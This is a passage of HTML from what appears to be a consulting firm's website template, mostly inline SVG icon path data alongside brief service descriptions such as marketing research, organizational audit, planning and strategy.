c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve beven a strategy thought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy tmhought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    